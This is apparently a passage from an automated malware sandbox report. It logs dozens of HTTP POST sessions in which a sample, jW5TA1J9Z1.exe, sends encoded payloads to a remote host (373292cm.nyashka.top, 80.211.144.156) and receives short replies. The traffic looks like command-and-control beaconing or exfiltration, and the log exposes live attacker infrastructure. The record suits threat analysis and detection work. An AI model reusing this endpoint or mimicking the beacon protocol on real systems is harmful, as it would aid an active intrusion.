                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[
                                                                    Aug 21, 2024 10:04:39.144650936 CEST | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:38 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    100 | 192.168.2.7 | 53059 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Aug 21, 2024 10:04:39.273078918 CEST | 305 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Aug 21, 2024 10:04:39.630863905 CEST2544OUTData Raw: 5f 5c 5c 5f 54 41 54 5c 5b 5f 5a 51 59 52 58 54 57 5d 5d 5c 57 5d 53 5a 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _\\_TAT\[_ZQYRXTW]]\W]SZYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U-/ 0"-]706=??..+'43R#!(?3#:,.&F$.Y/1
                                                                    Aug 21, 2024 10:04:39.932106018 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:40.057676077 CEST | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:39 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    101 | 192.168.2.7 | 53060 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Aug 21, 2024 10:04:40.179615974 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:04:40.537117004 CEST2544OUTData Raw: 5a 52 5c 5e 54 40 54 5b 5b 5f 5a 51 59 54 58 56 57 50 5d 58 57 50 53 5e 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: ZR\^T@T[[_ZQYTXVWP]XWPS^YY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U-,3".(70)+-/+.5[< #W 2<V+)0" 2,.&F$.Y/)
                                                                    Aug 21, 2024 10:04:40.834144115 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:41.031397104 CEST | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:40 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    102 | 192.168.2.7 | 53061 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Aug 21, 2024 10:04:41.281421900 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:04:42.000904083 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:42.131247044 CEST | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:41 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    103 | 192.168.2.7 | 53062 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Aug 21, 2024 10:04:42.744857073 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    104 | 192.168.2.7 | 53063 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Aug 21, 2024 10:04:43.139095068 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 1844
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:04:43.825052023 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:43.951148033 CEST | 308 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:43 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 152
                                                                    Connection: keep-alive


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    105 | 192.168.2.7 | 53064 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Aug 21, 2024 10:04:43.259960890 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:04:43.940027952 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:44.275019884 CEST | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:43 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[
                                                                    Aug 21, 2024 10:04:44.280909061 CEST | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:43 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    106 | 192.168.2.7 | 53065 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Aug 21, 2024 10:04:44.398610115 CEST | 305 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Aug 21, 2024 10:04:45.081003904 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:45.215542078 CEST | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:44 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    107 | 192.168.2.7 | 53066 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Aug 21, 2024 10:04:45.338490009 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:04:46.039570093 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:46.230125904 CEST | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:45 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    108 | 192.168.2.7 | 53067 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Aug 21, 2024 10:04:46.351188898 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:04:47.053410053 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:47.195375919 CEST | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:46 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    109 | 192.168.2.7 | 53068 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Aug 21, 2024 10:04:47.320100069 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:04:48.010880947 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:48.145291090 CEST | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:47 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    110 | 192.168.2.7 | 53069 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Aug 21, 2024 10:04:48.273353100 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:04:48.967870951 CEST | 25 | IN | HTTP/1.1 100 Continue


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    111 | 192.168.2.7 | 53070 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Aug 21, 2024 10:04:48.983721018 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 1844
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:04:49.677356005 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:49.813292027 CEST | 308 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:49 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 152
                                                                    Connection: keep-alive


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    112 | 192.168.2.7 | 53071 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Aug 21, 2024 10:04:49.133306026 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:04:49.805289984 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:50.016907930 CEST | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:49 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    113 | 192.168.2.7 | 53072 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Aug 21, 2024 10:04:50.149502039 CEST | 305 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Aug 21, 2024 10:04:50.505877018 CEST2544OUTData Raw: 5a 52 59 54 54 47 54 51 5b 5f 5a 51 59 54 58 51 57 51 5d 5d 57 59 53 5a 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: ZRYTTGTQ[_ZQYTXQWQ]]WYSZYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U.8U !.4\7)Z)<_+=>(=4 Z+W#!??)845Y/.&F$.Y/)
                                                                    Aug 21, 2024 10:04:50.825835943 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:50.957684040 CEST | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:50 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session ID: 114 | Source IP: 192.168.2.7 | Source Port: 53073 | Destination IP: 80.211.144.156 | Destination Port: 80 | PID: 7840 | Process: C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Aug 21, 2024 10:04:51.091443062 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:04:51.443417072 CEST2544OUTData Raw: 5a 52 59 52 54 41 54 5f 5b 5f 5a 51 59 50 58 53 57 51 5d 5c 57 5e 53 59 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: ZRYRTAT_[_ZQYPXSWQ]\W^SYYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U.; '!-] %\*[#?=)\(-, /R !<937&.>&F$.Y/
                                                                    Aug 21, 2024 10:04:51.783622980 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:51.988327026 CEST | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:51 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session ID: 115 | Source IP: 192.168.2.7 | Source Port: 53074 | Destination IP: 80.211.144.156 | Destination Port: 80 | PID: 7840 | Process: C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Aug 21, 2024 10:04:52.470546007 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2536
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:04:52.818470955 CEST2536OUTData Raw: 5f 5c 5c 57 54 44 54 5f 5b 5f 5a 51 59 57 58 5f 57 5c 5d 5f 57 5d 53 55 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _\\WTDT_[_ZQYWX_W\]_W]SUYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U-/03C#=;736)=$+6)=7 ,42 (*'_43%^,>&F$.Y/
                                                                    Aug 21, 2024 10:04:53.142668009 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:53.273083925 CEST | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:52 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session ID: 116 | Source IP: 192.168.2.7 | Source Port: 53075 | Destination IP: 80.211.144.156 | Destination Port: 80 | PID: 7840 | Process: C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Aug 21, 2024 10:04:53.400290966 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:04:53.755811930 CEST2544OUTData Raw: 5f 51 59 55 54 41 54 5b 5b 5f 5a 51 59 5e 58 50 57 5d 5d 58 57 5a 53 5a 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _QYUTAT[[_ZQY^XPW]]XWZSZYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U-80#D#-+7&=[ ?X!)=$ <0#(S()<#Y/.&F$.Y/
                                                                    Aug 21, 2024 10:04:54.086014986 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:54.504322052 CEST | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:53 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[
                                                                    Aug 21, 2024 10:04:54.504532099 CEST | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:53 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session ID: 117 | Source IP: 192.168.2.7 | Source Port: 53076 | Destination IP: 80.211.144.156 | Destination Port: 80 | PID: 7840 | Process: C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Aug 21, 2024 10:04:54.635410070 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive


                                                                    Session ID: 118 | Source IP: 192.168.2.7 | Source Port: 53077 | Destination IP: 80.211.144.156 | Destination Port: 80 | PID: 7840 | Process: C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Aug 21, 2024 10:04:54.824835062 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 1868
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:04:55.526478052 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:05:10.244393110 CEST1868OUTData Raw: 5f 51 59 50 54 40 51 5e 5b 5f 5a 51 59 55 58 54 57 50 5d 5d 57 5c 53 59 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _QYPT@Q^[_ZQYUXTWP]]W\SYYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U-,+5=3# 2*>,>.>)-("<'7#(*;702.>&F$.Y/-
                                                                    Aug 21, 2024 10:05:10.546905994 CEST | 308 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:05:10 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 152
                                                                    Connection: keep-alive
